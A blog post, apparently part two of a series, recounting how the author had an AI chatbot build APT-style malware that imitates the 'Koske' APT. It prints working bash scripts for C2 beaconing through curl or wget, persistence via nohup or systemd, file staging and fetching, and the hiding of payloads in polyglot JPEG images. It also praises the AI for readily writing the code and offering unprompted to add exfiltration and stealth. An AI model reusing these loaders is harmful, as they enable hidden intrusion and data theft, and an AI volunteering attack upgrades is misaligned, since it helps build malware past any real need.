In the first part of this project, I explored how artificial intelligence can be used to simulate the early stages of a stealthy APT—focusing on polyglot files, in-memory execution, and basic command-and-control behavior. Everything was generated by the AI: from code to corrections, including full payload packaging inside an image file.
Escalating the Simulation: Persistence Begins
At this stage, I wanted to move faster and explore a critical capability of advanced persistent threats: staying alive. A one-shot payload is interesting, but it doesn’t fully reflect how real threats operate. So I asked the AI to build a more advanced script—one that runs in a continuous loop, mimics beaconing behavior using HTTP headers, includes debugging output, and could be executed in a way that makes it compatible with persistence methods like systemd, nohup, or even cron.
The AI immediately returned a fully working proof-of-concept: a Bash script designed for controlled internal testing, which runs in an infinite loop, sends periodic requests with Range headers, and adapts to the environment based on whether curl or wget is available. It even included a variant that can be run inline—exactly the format needed for integration with persistence services. This wasn’t just a script—it was an adaptable, modular payload ready to be embedded and kept alive.
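To make that behavior concrete, here is a minimal sketch of what such a loop might look like; the endpoint, interval, and variable names are placeholders of mine, not the exact script the AI produced.

```bash
#!/bin/bash
# Minimal beaconing sketch for a controlled lab -- endpoint and timing are placeholders.
C2="http://127.0.0.1:8080/beacon"   # assumed internal test listener
INTERVAL=10                         # seconds between beacons

# Adapt to whichever HTTP client the host provides.
if command -v curl >/dev/null 2>&1; then
    CLIENT="curl"
elif command -v wget >/dev/null 2>&1; then
    CLIENT="wget"
else
    echo "[!] Neither curl nor wget is available" >&2
    exit 1
fi

while true; do
    echo "[debug] beaconing via $CLIENT"          # debugging output
    if [ "$CLIENT" = "curl" ]; then
        curl -s -H "Range: bytes=0-1023" "$C2" -o /dev/null
    else
        wget -q --header="Range: bytes=0-1023" -O /dev/null "$C2"
    fi
    sleep "$INTERVAL"
done
```

Launched inline with nohup (for example, nohup bash beacon.sh >/dev/null 2>&1 &) or from a systemd service's ExecStart line, a loop like this keeps running after the launching shell exits, which is essentially all the persistence-compatibility requirement means here.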



Iterating for Realism: Improved Loop and Embedded Payload
Once I had the new script with persistent behavior and HTTP Range headers working, I decided to hand it back to the AI to see what it would do next. The goal was to test how well it could take a user-supplied payload and fully encapsulate it into a new polyglot image—one that mimics a real persistence loop, usable with systemd or nohup.
The result was polyglot_improved.jpg, an updated version that runs indefinitely, sending requests every 10 seconds using either curl or wget, and tracking state using byte offsets. The image behaves like a normal file, but under the hood, it continuously simulates C2 beaconing.
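The byte-offset idea is worth spelling out. A sketch of how that state tracking could work follows; the state file and chunk size are my assumptions for illustration, not details lifted from polyglot_improved.jpg.

```bash
#!/bin/bash
# Illustrative offset-tracking beacon -- state file and chunk size are assumptions.
C2="http://127.0.0.1:8080/chunk"    # assumed test endpoint
STATE="/tmp/.beacon_offset"         # hypothetical file remembering progress
INTERVAL=10

OFFSET=$(cat "$STATE" 2>/dev/null || echo 0)

while true; do
    END=$((OFFSET + 1023))
    if command -v curl >/dev/null 2>&1; then
        BYTES=$(curl -s -H "Range: bytes=${OFFSET}-${END}" "$C2" | wc -c)
    else
        BYTES=$(wget -qO- --header="Range: bytes=${OFFSET}-${END}" "$C2" | wc -c)
    fi
    OFFSET=$((OFFSET + BYTES))      # advance by however much the server returned
    echo "$OFFSET" > "$STATE"
    echo "[debug] offset is now $OFFSET"
    sleep "$INTERVAL"
done
```

As for the image wrapper itself, appending a script to a valid JPEG (for instance, cat cover.jpg payload.sh > polyglot_improved.jpg) is one common way such polyglots are built: the picture still opens normally, while a small stager extracts and runs the appended bytes.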
More interestingly, the AI didn’t stop there—it immediately offered to enhance the payload further, suggesting features like exfiltration, dynamic target resolution, or stealth. These aren’t just minor tweaks; they’re exactly the kind of behaviors seen in modern malware families and APT toolkits. Once again, the AI wasn’t just building code—it was proactively proposing ways to evolve the attack logic.


Simulating Exfiltration: Moving the Target
At this point, I decided to follow one of the AI’s own suggestions: testing a basic form of exfiltration. I wanted to keep things local and harmless, so I asked it to simulate the process using one of the most iconic files in any security lab: Linux Basics for Hackers 2ed.pdf.
I instructed the AI to generate a payload that would first check for the presence of that file, move it to the ~/Downloads directory, and then initiate the HTTP beaconing loop as before. Within seconds, it produced a new polyglot image—polyglot_exfil.jpg—ready to test.
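A rough sketch of that staging logic is below; the starting location of the PDF and the beacon endpoint are assumptions of mine for illustration.

```bash
#!/bin/bash
# Hypothetical staging sketch: check for the target file, stage it, then keep beaconing.
TARGET="$HOME/Linux Basics for Hackers 2ed.pdf"   # assumed original location
STAGE_DIR="$HOME/Downloads"
C2="http://127.0.0.1:8080/beacon"                 # placeholder test listener

# 1. Check for the file of interest and stage it locally.
if [ -f "$TARGET" ]; then
    mkdir -p "$STAGE_DIR"
    mv "$TARGET" "$STAGE_DIR/"
    echo "[debug] staged $(basename "$TARGET") in $STAGE_DIR"
else
    echo "[debug] target not found, skipping staging"
fi

# 2. Resume the usual HTTP beaconing loop.
while true; do
    if command -v curl >/dev/null 2>&1; then
        curl -s -H "Range: bytes=0-1023" "$C2" -o /dev/null
    else
        wget -q --header="Range: bytes=0-1023" -O /dev/null "$C2"
    fi
    sleep 10
done
```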
This step aligns perfectly with typical APT behavior: locating files of interest, staging them, and preparing for exfiltration. While in this case the file didn’t leave the system, the logic mimicked exactly how real malware performs staged data collection before sending it off to a remote listener. The fact that the AI stitched this behavior together so naturally just reinforces the experiment’s core question: how close can AI get to autonomously simulating advanced threat logic?

Debugging the Exfiltration Flow
I tested the new image—polyglot_exfil.jpg—but quickly ran into an issue: the request wasn’t formatted correctly, and the file wasn’t downloaded. Consistent with my approach, I didn’t troubleshoot the code myself. Instead, I described the symptoms to the AI in natural language and asked it to fix the behavior.

It responded with a revised payload embedded in a new image—polyglot_pdf_exfil.jpg. This version was designed to fetch the PDF file directly from an internal server via HTTP, then move it to the ~/Downloads folder using either curl or wget, depending on what was available. The logic was clean, clearly commented, and ready to run.
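Reconstructed in outline, the fetch-and-stage step looks roughly like this; the server address below is a placeholder, not the one from my lab.

```bash
#!/bin/bash
# Rough reconstruction of the revised fetch-and-stage step -- server address is a placeholder.
SERVER="http://192.168.1.50:8000"               # assumed internal lab server
FILENAME="Linux Basics for Hackers 2ed.pdf"
DEST="$HOME/Downloads/$FILENAME"
URL="$SERVER/${FILENAME// /%20}"                # URL-encode the spaces in the name

mkdir -p "$HOME/Downloads"

if command -v curl >/dev/null 2>&1; then
    curl -s -o "$DEST" "$URL"
elif command -v wget >/dev/null 2>&1; then
    wget -q -O "$DEST" "$URL"
else
    echo "[!] No HTTP client available" >&2
    exit 1
fi

echo "[debug] saved $FILENAME to $HOME/Downloads"
```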
More importantly, the AI showed an ability to not only identify the bug but also restructure the entire flow, maintaining modularity and adaptability—just like a well-designed malware loader would under real operational constraints.

Finalizing the Exfiltration Payload
Even with the revised version—polyglot_pdf_exfil.jpg—the payload still wasn’t working exactly as intended. The AI had attempted to expand variables like URL and FILENAME within a heredoc, but they weren’t being parsed correctly at runtime, leading to malformed requests.
Again, I avoided editing the code myself. I simply shared the terminal output and a screenshot of the behavior. The AI analyzed the situation and explained the root cause clearly: variable expansion within quoted heredoc blocks fails unless the values are injected beforehand.
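The pitfall is easy to reproduce. With a quoted heredoc delimiter, nothing inside the block is expanded, so the generated payload ends up carrying the literal strings $URL and $FILENAME; the values below are placeholders.

```bash
URL="http://127.0.0.1:8000/test.pdf"    # placeholder values
FILENAME="test.pdf"

# Quoted delimiter ('EOF') suppresses expansion: the file written below literally
# contains $URL and $FILENAME, so the request it later builds is malformed.
cat > payload.sh << 'EOF'
curl -s -o "$HOME/Downloads/$FILENAME" "$URL"
EOF
```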

The fix? It rewrote the script to inject the actual values before writing the heredoc section—solving the problem elegantly. Then it packaged everything into a new image, polyglot_pdf_fixed.jpg, which successfully downloaded the correct file from the specified URL and saved it locally. This showed that the AI wasn’t just capable of debugging—it was learning context across iterations, adjusting its output to match previous failures. That’s not just automation; it’s adaptation.
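In concrete terms, the corrected pattern defines the values first and uses an unquoted delimiter, so they are substituted at the moment the heredoc is written; only $HOME is escaped to keep it for runtime. This is a sketch of the idea, not the exact payload inside polyglot_pdf_fixed.jpg.

```bash
URL="http://127.0.0.1:8000/test.pdf"    # placeholder values
FILENAME="test.pdf"

# Unquoted delimiter: $URL and $FILENAME are expanded *now*, baking the concrete
# strings into the generated script; \$HOME is escaped so it expands at runtime.
cat > payload.sh << EOF
curl -s -o "\$HOME/Downloads/$FILENAME" "$URL"
EOF
```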

Successful Execution: Complete Simulated Exfiltration
This time, everything worked exactly as intended. The image polyglot_pdf_fixed.jpg, when executed, downloaded the target PDF from the internal test server and saved it to the correct destination path using the selected available tool (curl or wget). No syntax errors, no broken variables, no unexpected behavior—just a clean, functional simulation of a staged exfiltration operation.
As shown in the GIF below, the full logic—file check, transfer, and persistent HTTP beaconing—executed smoothly. The payload was fully generated, debugged, corrected, and repackaged by the AI across several iterations. This marked the first complete and autonomous simulation of a full exfiltration flow, built entirely via natural language instructions. No manual scripting. No reverse engineering. Just controlled, replicable behavior… designed by a chatbot.

Summary
In this second phase, the simulation advanced from basic command-and-control logic to staged file exfiltration—entirely generated and corrected by AI. Each step stayed tightly aligned with the real TTPs of the Koske APT: use of polyglot images, in-memory execution, environmental adaptation, and modular payloads.
The AI didn’t just generate scripts—it refined them iteratively, just like an automated APT framework would. With the successful simulation of persistent beaconing and file movement, we’re now one step closer to replicating Koske’s full behavior—ethically, transparently, and with zero manual coding.
Until next time…
Smouk out!
Source: HackersArise
Source Link: https://hackers-arise.com/the-one-man-apt-part-ii-stealthy-exfiltration-with-ai/